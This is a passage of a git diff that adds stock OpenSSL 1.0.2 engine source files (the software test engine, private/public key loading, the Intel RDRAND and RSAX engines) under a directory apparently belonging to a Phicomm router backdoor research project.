+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ * ECDH support in OpenSSL originally developed by
+ * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project.
+ */
+
+#include <stdio.h>
+#include <openssl/crypto.h>
+#include "cryptlib.h"
+#include <openssl/engine.h>
+#include <openssl/dso.h>
+#include <openssl/pem.h>
+#include <openssl/evp.h>
+#include <openssl/rand.h>
+#ifndef OPENSSL_NO_RSA
+# include <openssl/rsa.h>
+#endif
+#ifndef OPENSSL_NO_DSA
+# include <openssl/dsa.h>
+#endif
+#ifndef OPENSSL_NO_DH
+# include <openssl/dh.h>
+#endif
+
+/*
+ * This testing gunk is implemented (and explained) lower down. It also
+ * assumes the application explicitly calls "ENGINE_load_openssl()" because
+ * this is no longer automatic in ENGINE_load_builtin_engines().
+ */
+#define TEST_ENG_OPENSSL_RC4
+#define TEST_ENG_OPENSSL_PKEY
+/* #define TEST_ENG_OPENSSL_RC4_OTHERS */
+#define TEST_ENG_OPENSSL_RC4_P_INIT
+/* #define TEST_ENG_OPENSSL_RC4_P_CIPHER */
+#define TEST_ENG_OPENSSL_SHA
+/* #define TEST_ENG_OPENSSL_SHA_OTHERS */
+/* #define TEST_ENG_OPENSSL_SHA_P_INIT */
+/* #define TEST_ENG_OPENSSL_SHA_P_UPDATE */
+/* #define TEST_ENG_OPENSSL_SHA_P_FINAL */
+
+/* Now check what of those algorithms are actually enabled */
+#ifdef OPENSSL_NO_RC4
+# undef TEST_ENG_OPENSSL_RC4
+# undef TEST_ENG_OPENSSL_RC4_OTHERS
+# undef TEST_ENG_OPENSSL_RC4_P_INIT
+# undef TEST_ENG_OPENSSL_RC4_P_CIPHER
+#endif
+#if defined(OPENSSL_NO_SHA) || defined(OPENSSL_NO_SHA0) || defined(OPENSSL_NO_SHA1)
+# undef TEST_ENG_OPENSSL_SHA
+# undef TEST_ENG_OPENSSL_SHA_OTHERS
+# undef TEST_ENG_OPENSSL_SHA_P_INIT
+# undef TEST_ENG_OPENSSL_SHA_P_UPDATE
+# undef TEST_ENG_OPENSSL_SHA_P_FINAL
+#endif
+
+#ifdef TEST_ENG_OPENSSL_RC4
+static int openssl_ciphers(ENGINE *e, const EVP_CIPHER **cipher,
+                           const int **nids, int nid);
+#endif
+#ifdef TEST_ENG_OPENSSL_SHA
+static int openssl_digests(ENGINE *e, const EVP_MD **digest,
+                           const int **nids, int nid);
+#endif
+
+#ifdef TEST_ENG_OPENSSL_PKEY
+static EVP_PKEY *openssl_load_privkey(ENGINE *eng, const char *key_id,
+                                      UI_METHOD *ui_method,
+                                      void *callback_data);
+#endif
+
+/* The constants used when creating the ENGINE */
+static const char *engine_openssl_id = "openssl";
+static const char *engine_openssl_name = "Software engine support";
+
+/*
+ * This internal function is used by ENGINE_openssl() and possibly by the
+ * "dynamic" ENGINE support too
+ */
+static int bind_helper(ENGINE *e)
+{
+    if (!ENGINE_set_id(e, engine_openssl_id)
+        || !ENGINE_set_name(e, engine_openssl_name)
+#ifndef TEST_ENG_OPENSSL_NO_ALGORITHMS
+# ifndef OPENSSL_NO_RSA
+        || !ENGINE_set_RSA(e, RSA_get_default_method())
+# endif
+# ifndef OPENSSL_NO_DSA
+        || !ENGINE_set_DSA(e, DSA_get_default_method())
+# endif
+# ifndef OPENSSL_NO_ECDH
+        || !ENGINE_set_ECDH(e, ECDH_OpenSSL())
+# endif
+# ifndef OPENSSL_NO_ECDSA
+        || !ENGINE_set_ECDSA(e, ECDSA_OpenSSL())
+# endif
+# ifndef OPENSSL_NO_DH
+        || !ENGINE_set_DH(e, DH_get_default_method())
+# endif
+        || !ENGINE_set_RAND(e, RAND_SSLeay())
+# ifdef TEST_ENG_OPENSSL_RC4
+        || !ENGINE_set_ciphers(e, openssl_ciphers)
+# endif
+# ifdef TEST_ENG_OPENSSL_SHA
+        || !ENGINE_set_digests(e, openssl_digests)
+# endif
+#endif
+#ifdef TEST_ENG_OPENSSL_PKEY
+        || !ENGINE_set_load_privkey_function(e, openssl_load_privkey)
+#endif
+        )
+        return 0;
+    /*
+     * If we add errors to this ENGINE, ensure the error handling is setup
+     * here
+     */
+    /* openssl_load_error_strings(); */
+    return 1;
+}
+
+static ENGINE *engine_openssl(void)
+{
+    ENGINE *ret = ENGINE_new();
+    if (!ret)
+        return NULL;
+    if (!bind_helper(ret)) {
+        ENGINE_free(ret);
+        return NULL;
+    }
+    return ret;
+}
+
+void ENGINE_load_openssl(void)
+{
+    ENGINE *toadd = engine_openssl();
+    if (!toadd)
+        return;
+    ENGINE_add(toadd);
+    /*
+     * If the "add" worked, it gets a structural reference. So either way, we
+     * release our just-created reference.
+     */
+    ENGINE_free(toadd);
+    ERR_clear_error();
+}
+
+/*
+ * This stuff is needed if this ENGINE is being compiled into a
+ * self-contained shared-library.
+ */
+#ifdef ENGINE_DYNAMIC_SUPPORT
+static int bind_fn(ENGINE *e, const char *id)
+{
+    if (id && (strcmp(id, engine_openssl_id) != 0))
+        return 0;
+    if (!bind_helper(e))
+        return 0;
+    return 1;
+}
+
+IMPLEMENT_DYNAMIC_CHECK_FN()
+    IMPLEMENT_DYNAMIC_BIND_FN(bind_fn)
+#endif                          /* ENGINE_DYNAMIC_SUPPORT */
+#ifdef TEST_ENG_OPENSSL_RC4
+/*-
+ * This section of code compiles an "alternative implementation" of two modes of
+ * RC4 into this ENGINE. The result is that EVP_CIPHER operation for "rc4"
+ * should under normal circumstances go via this support rather than the default
+ * EVP support. There are other symbols to tweak the testing;
+ *    TEST_ENC_OPENSSL_RC4_OTHERS - print a one line message to stderr each time
+ *        we're asked for a cipher we don't support (should not happen).
+ *    TEST_ENG_OPENSSL_RC4_P_INIT - print a one line message to stderr each time
+ *        the "init_key" handler is called.
+ *    TEST_ENG_OPENSSL_RC4_P_CIPHER - ditto for the "cipher" handler.
+ */
+# include <openssl/rc4.h>
+# define TEST_RC4_KEY_SIZE               16
+static int test_cipher_nids[] = { NID_rc4, NID_rc4_40 };
+
+static int test_cipher_nids_number = 2;
+typedef struct {
+    unsigned char key[TEST_RC4_KEY_SIZE];
+    RC4_KEY ks;
+} TEST_RC4_KEY;
+# define test(ctx) ((TEST_RC4_KEY *)(ctx)->cipher_data)
+static int test_rc4_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                             const unsigned char *iv, int enc)
+{
+# ifdef TEST_ENG_OPENSSL_RC4_P_INIT
+    fprintf(stderr, "(TEST_ENG_OPENSSL_RC4) test_init_key() called\n");
+# endif
+    memcpy(&test(ctx)->key[0], key, EVP_CIPHER_CTX_key_length(ctx));
+    RC4_set_key(&test(ctx)->ks, EVP_CIPHER_CTX_key_length(ctx),
+                test(ctx)->key);
+    return 1;
+}
+
+static int test_rc4_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                           const unsigned char *in, size_t inl)
+{
+# ifdef TEST_ENG_OPENSSL_RC4_P_CIPHER
+    fprintf(stderr, "(TEST_ENG_OPENSSL_RC4) test_cipher() called\n");
+# endif
+    RC4(&test(ctx)->ks, inl, in, out);
+    return 1;
+}
+
+static const EVP_CIPHER test_r4_cipher = {
+    NID_rc4,
+    1, TEST_RC4_KEY_SIZE, 0,
+    EVP_CIPH_VARIABLE_LENGTH,
+    test_rc4_init_key,
+    test_rc4_cipher,
+    NULL,
+    sizeof(TEST_RC4_KEY),
+    NULL,
+    NULL,
+    NULL,
+    NULL
+};
+
+static const EVP_CIPHER test_r4_40_cipher = {
+    NID_rc4_40,
+    1, 5 /* 40 bit */ , 0,
+    EVP_CIPH_VARIABLE_LENGTH,
+    test_rc4_init_key,
+    test_rc4_cipher,
+    NULL,
+    sizeof(TEST_RC4_KEY),
+    NULL,
+    NULL,
+    NULL,
+    NULL
+};
+
+static int openssl_ciphers(ENGINE *e, const EVP_CIPHER **cipher,
+                           const int **nids, int nid)
+{
+    if (!cipher) {
+        /* We are returning a list of supported nids */
+        *nids = test_cipher_nids;
+        return test_cipher_nids_number;
+    }
+    /* We are being asked for a specific cipher */
+    if (nid == NID_rc4)
+        *cipher = &test_r4_cipher;
+    else if (nid == NID_rc4_40)
+        *cipher = &test_r4_40_cipher;
+    else {
+# ifdef TEST_ENG_OPENSSL_RC4_OTHERS
+        fprintf(stderr, "(TEST_ENG_OPENSSL_RC4) returning NULL for "
+                "nid %d\n", nid);
+# endif
+        *cipher = NULL;
+        return 0;
+    }
+    return 1;
+}
+#endif
+
+#ifdef TEST_ENG_OPENSSL_SHA
+/* Much the same sort of comment as for TEST_ENG_OPENSSL_RC4 */
+# include <openssl/sha.h>
+static int test_digest_nids[] = { NID_sha1 };
+
+static int test_digest_nids_number = 1;
+static int test_sha1_init(EVP_MD_CTX *ctx)
+{
+# ifdef TEST_ENG_OPENSSL_SHA_P_INIT
+    fprintf(stderr, "(TEST_ENG_OPENSSL_SHA) test_sha1_init() called\n");
+# endif
+    return SHA1_Init(ctx->md_data);
+}
+
+static int test_sha1_update(EVP_MD_CTX *ctx, const void *data, size_t count)
+{
+# ifdef TEST_ENG_OPENSSL_SHA_P_UPDATE
+    fprintf(stderr, "(TEST_ENG_OPENSSL_SHA) test_sha1_update() called\n");
+# endif
+    return SHA1_Update(ctx->md_data, data, count);
+}
+
+static int test_sha1_final(EVP_MD_CTX *ctx, unsigned char *md)
+{
+# ifdef TEST_ENG_OPENSSL_SHA_P_FINAL
+    fprintf(stderr, "(TEST_ENG_OPENSSL_SHA) test_sha1_final() called\n");
+# endif
+    return SHA1_Final(md, ctx->md_data);
+}
+
+static const EVP_MD test_sha_md = {
+    NID_sha1,
+    NID_sha1WithRSAEncryption,
+    SHA_DIGEST_LENGTH,
+    0,
+    test_sha1_init,
+    test_sha1_update,
+    test_sha1_final,
+    NULL,
+    NULL,
+    EVP_PKEY_RSA_method,
+    SHA_CBLOCK,
+    sizeof(EVP_MD *) + sizeof(SHA_CTX),
+};
+
+static int openssl_digests(ENGINE *e, const EVP_MD **digest,
+                           const int **nids, int nid)
+{
+    if (!digest) {
+        /* We are returning a list of supported nids */
+        *nids = test_digest_nids;
+        return test_digest_nids_number;
+    }
+    /* We are being asked for a specific digest */
+    if (nid == NID_sha1)
+        *digest = &test_sha_md;
+    else {
+# ifdef TEST_ENG_OPENSSL_SHA_OTHERS
+        fprintf(stderr, "(TEST_ENG_OPENSSL_SHA) returning NULL for "
+                "nid %d\n", nid);
+# endif
+        *digest = NULL;
+        return 0;
+    }
+    return 1;
+}
+#endif
+
+#ifdef TEST_ENG_OPENSSL_PKEY
+static EVP_PKEY *openssl_load_privkey(ENGINE *eng, const char *key_id,
+                                      UI_METHOD *ui_method,
+                                      void *callback_data)
+{
+    BIO *in;
+    EVP_PKEY *key;
+    fprintf(stderr, "(TEST_ENG_OPENSSL_PKEY)Loading Private key %s\n",
+            key_id);
+    in = BIO_new_file(key_id, "r");
+    if (!in)
+        return NULL;
+    key = PEM_read_bio_PrivateKey(in, NULL, 0, NULL);
+    BIO_free(in);
+    return key;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_pkey.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_pkey.c
new file mode 100644
index 0000000..23580d9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_pkey.c
@@ -0,0 +1,186 @@
+/* crypto/engine/eng_pkey.c */
+/* ====================================================================
+ * Copyright (c) 1999-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "eng_int.h"
+
+/* Basic get/set stuff */
+
+int ENGINE_set_load_privkey_function(ENGINE *e,
+                                     ENGINE_LOAD_KEY_PTR loadpriv_f)
+{
+    e->load_privkey = loadpriv_f;
+    return 1;
+}
+
+int ENGINE_set_load_pubkey_function(ENGINE *e, ENGINE_LOAD_KEY_PTR loadpub_f)
+{
+    e->load_pubkey = loadpub_f;
+    return 1;
+}
+
+int ENGINE_set_load_ssl_client_cert_function(ENGINE *e,
+                                             ENGINE_SSL_CLIENT_CERT_PTR
+                                             loadssl_f)
+{
+    e->load_ssl_client_cert = loadssl_f;
+    return 1;
+}
+
+ENGINE_LOAD_KEY_PTR ENGINE_get_load_privkey_function(const ENGINE *e)
+{
+    return e->load_privkey;
+}
+
+ENGINE_LOAD_KEY_PTR ENGINE_get_load_pubkey_function(const ENGINE *e)
+{
+    return e->load_pubkey;
+}
+
+ENGINE_SSL_CLIENT_CERT_PTR ENGINE_get_ssl_client_cert_function(const ENGINE
+                                                               *e)
+{
+    return e->load_ssl_client_cert;
+}
+
+/* API functions to load public/private keys */
+
+EVP_PKEY *ENGINE_load_private_key(ENGINE *e, const char *key_id,
+                                  UI_METHOD *ui_method, void *callback_data)
+{
+    EVP_PKEY *pkey;
+
+    if (e == NULL) {
+        ENGINEerr(ENGINE_F_ENGINE_LOAD_PRIVATE_KEY,
+                  ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+    CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+    if (e->funct_ref == 0) {
+        CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+        ENGINEerr(ENGINE_F_ENGINE_LOAD_PRIVATE_KEY, ENGINE_R_NOT_INITIALISED);
+        return 0;
+    }
+    CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+    if (!e->load_privkey) {
+        ENGINEerr(ENGINE_F_ENGINE_LOAD_PRIVATE_KEY,
+                  ENGINE_R_NO_LOAD_FUNCTION);
+        return 0;
+    }
+    pkey = e->load_privkey(e, key_id, ui_method, callback_data);
+    if (!pkey) {
+        ENGINEerr(ENGINE_F_ENGINE_LOAD_PRIVATE_KEY,
+                  ENGINE_R_FAILED_LOADING_PRIVATE_KEY);
+        return 0;
+    }
+    return pkey;
+}
+
+EVP_PKEY *ENGINE_load_public_key(ENGINE *e, const char *key_id,
+                                 UI_METHOD *ui_method, void *callback_data)
+{
+    EVP_PKEY *pkey;
+
+    if (e == NULL) {
+        ENGINEerr(ENGINE_F_ENGINE_LOAD_PUBLIC_KEY,
+                  ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+    CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+    if (e->funct_ref == 0) {
+        CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+        ENGINEerr(ENGINE_F_ENGINE_LOAD_PUBLIC_KEY, ENGINE_R_NOT_INITIALISED);
+        return 0;
+    }
+    CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+    if (!e->load_pubkey) {
+        ENGINEerr(ENGINE_F_ENGINE_LOAD_PUBLIC_KEY, ENGINE_R_NO_LOAD_FUNCTION);
+        return 0;
+    }
+    pkey = e->load_pubkey(e, key_id, ui_method, callback_data);
+    if (!pkey) {
+        ENGINEerr(ENGINE_F_ENGINE_LOAD_PUBLIC_KEY,
+                  ENGINE_R_FAILED_LOADING_PUBLIC_KEY);
+        return 0;
+    }
+    return pkey;
+}
+
+int ENGINE_load_ssl_client_cert(ENGINE *e, SSL *s,
+                                STACK_OF(X509_NAME) *ca_dn, X509 **pcert,
+                                EVP_PKEY **ppkey, STACK_OF(X509) **pother,
+                                UI_METHOD *ui_method, void *callback_data)
+{
+
+    if (e == NULL) {
+        ENGINEerr(ENGINE_F_ENGINE_LOAD_SSL_CLIENT_CERT,
+                  ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+    CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+    if (e->funct_ref == 0) {
+        CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+        ENGINEerr(ENGINE_F_ENGINE_LOAD_SSL_CLIENT_CERT,
+                  ENGINE_R_NOT_INITIALISED);
+        return 0;
+    }
+    CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+    if (!e->load_ssl_client_cert) {
+        ENGINEerr(ENGINE_F_ENGINE_LOAD_SSL_CLIENT_CERT,
+                  ENGINE_R_NO_LOAD_FUNCTION);
+        return 0;
+    }
+    return e->load_ssl_client_cert(e, s, ca_dn, pcert, ppkey, pother,
+                                   ui_method, callback_data);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_rdrand.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_rdrand.c
new file mode 100644
index 0000000..9316d6f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_rdrand.c
@@ -0,0 +1,149 @@
+/* ====================================================================
+ * Copyright (c) 2011 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#include <openssl/opensslconf.h>
+
+#include <stdio.h>
+#include <string.h>
+#include <openssl/engine.h>
+#include <openssl/rand.h>
+#include <openssl/err.h>
+
+#if (defined(__i386)   || defined(__i386__)   || defined(_M_IX86) || \
+     defined(__x86_64) || defined(__x86_64__) || \
+     defined(_M_AMD64) || defined (_M_X64)) && defined(OPENSSL_CPUID_OBJ)
+
+size_t OPENSSL_ia32_rdrand(void);
+
+static int get_random_bytes(unsigned char *buf, int num)
+{
+    size_t rnd;
+
+    while (num >= (int)sizeof(size_t)) {
+        if ((rnd = OPENSSL_ia32_rdrand()) == 0)
+            return 0;
+
+        *((size_t *)buf) = rnd;
+        buf += sizeof(size_t);
+        num -= sizeof(size_t);
+    }
+    if (num) {
+        if ((rnd = OPENSSL_ia32_rdrand()) == 0)
+            return 0;
+
+        memcpy(buf, &rnd, num);
+    }
+
+    return 1;
+}
+
+static int random_status(void)
+{
+    return 1;
+}
+
+static RAND_METHOD rdrand_meth = {
+    NULL,                       /* seed */
+    get_random_bytes,
+    NULL,                       /* cleanup */
+    NULL,                       /* add */
+    get_random_bytes,
+    random_status,
+};
+
+static int rdrand_init(ENGINE *e)
+{
+    return 1;
+}
+
+static const char *engine_e_rdrand_id = "rdrand";
+static const char *engine_e_rdrand_name = "Intel RDRAND engine";
+
+static int bind_helper(ENGINE *e)
+{
+    if (!ENGINE_set_id(e, engine_e_rdrand_id) ||
+        !ENGINE_set_name(e, engine_e_rdrand_name) ||
+        !ENGINE_set_flags(e, ENGINE_FLAGS_NO_REGISTER_ALL) ||
+        !ENGINE_set_init_function(e, rdrand_init) ||
+        !ENGINE_set_RAND(e, &rdrand_meth))
+        return 0;
+
+    return 1;
+}
+
+static ENGINE *ENGINE_rdrand(void)
+{
+    ENGINE *ret = ENGINE_new();
+    if (!ret)
+        return NULL;
+    if (!bind_helper(ret)) {
+        ENGINE_free(ret);
+        return NULL;
+    }
+    return ret;
+}
+
+void ENGINE_load_rdrand(void)
+{
+    extern unsigned int OPENSSL_ia32cap_P[];
+
+    if (OPENSSL_ia32cap_P[1] & (1 << (62 - 32))) {
+        ENGINE *toadd = ENGINE_rdrand();
+        if (!toadd)
+            return;
+        ENGINE_add(toadd);
+        ENGINE_free(toadd);
+        ERR_clear_error();
+    }
+}
+#else
+void ENGINE_load_rdrand(void)
+{
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_rsax.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_rsax.c
new file mode 100644
index 0000000..8362754
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_rsax.c
@@ -0,0 +1,701 @@
+/* crypto/engine/eng_rsax.c */
+/* Copyright (c) 2010-2010 Intel Corp.
+ *   Author: Vinodh.Gopal@intel.com
+ *           Jim Guilford
+ *           Erdinc.Ozturk@intel.com
+ *           Maxim.Perminov@intel.com
+ *           Ying.Huang@intel.com
+ *
+ * More information about algorithm used can be found at:
+ *   http://www.cse.buffalo.edu/srds2009/escs2009_submission_Gopal.pdf
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ */
+
+#include <openssl/opensslconf.h>
+
+#include <stdio.h>
+#include <string.h>
+#include <openssl/crypto.h>
+#include <openssl/buffer.h>
+#include <openssl/engine.h>
+#ifndef OPENSSL_NO_RSA
+# include <openssl/rsa.h>
+#endif
+#include <openssl/bn.h>
+#include <openssl/err.h>
+
+/* RSAX is available **ONLY* on x86_64 CPUs */
+#undef COMPILE_RSAX
+
+#if (defined(__x86_64) || defined(__x86_64__) || \
+     defined(_M_AMD64) || defined (_M_X64)) && !defined(OPENSSL_NO_ASM)
+# define COMPILE_RSAX
+static ENGINE *ENGINE_rsax(void);
+#endif
+
+void ENGINE_load_rsax(void)
+{
+/* On non-x86 CPUs it just returns. */
+#ifdef COMPILE_RSAX
+    ENGINE *toadd = ENGINE_rsax();
+    if (!toadd)
+        return;
+    ENGINE_add(toadd);
+    ENGINE_free(toadd);
+    ERR_clear_error();
+#endif
+}
+
+#ifdef COMPILE_RSAX
+# define E_RSAX_LIB_NAME "rsax engine"
+
+static int e_rsax_destroy(ENGINE *e);
+static int e_rsax_init(ENGINE *e);
+static int e_rsax_finish(ENGINE *e);
+static int e_rsax_ctrl(ENGINE *e, int cmd, long i, void *p, void (*f) (void));
+
+# ifndef OPENSSL_NO_RSA
+/* RSA stuff */
+static int e_rsax_rsa_mod_exp(BIGNUM *r, const BIGNUM *I, RSA *rsa,
+                              BN_CTX *ctx);
+static int e_rsax_rsa_finish(RSA *r);
+# endif
+
+static const ENGINE_CMD_DEFN e_rsax_cmd_defns[] = {
+    {0, NULL, NULL, 0}
+};
+
+# ifndef OPENSSL_NO_RSA
+/* Our internal RSA_METHOD that we provide pointers to */
+static RSA_METHOD e_rsax_rsa = {
+    "Intel RSA-X method",
+    NULL,
+    NULL,
+    NULL,
+    NULL,
+    e_rsax_rsa_mod_exp,
+    NULL,
+    NULL,
+    e_rsax_rsa_finish,
+    RSA_FLAG_CACHE_PUBLIC | RSA_FLAG_CACHE_PRIVATE,
+    NULL,
+    NULL,
+    NULL
+};
+# endif
+
+/* Constants used when creating the ENGINE */
+static const char *engine_e_rsax_id = "rsax";
+static const char *engine_e_rsax_name = "RSAX engine support";
+
+/* This internal function is used by ENGINE_rsax() */
+static int bind_helper(ENGINE *e)
+{
+# ifndef OPENSSL_NO_RSA
+    const RSA_METHOD *meth1;
+# endif
+    if (!ENGINE_set_id(e, engine_e_rsax_id) ||
+        !ENGINE_set_name(e, engine_e_rsax_name) ||
+# ifndef OPENSSL_NO_RSA
+        !ENGINE_set_RSA(e, &e_rsax_rsa) ||
+# endif
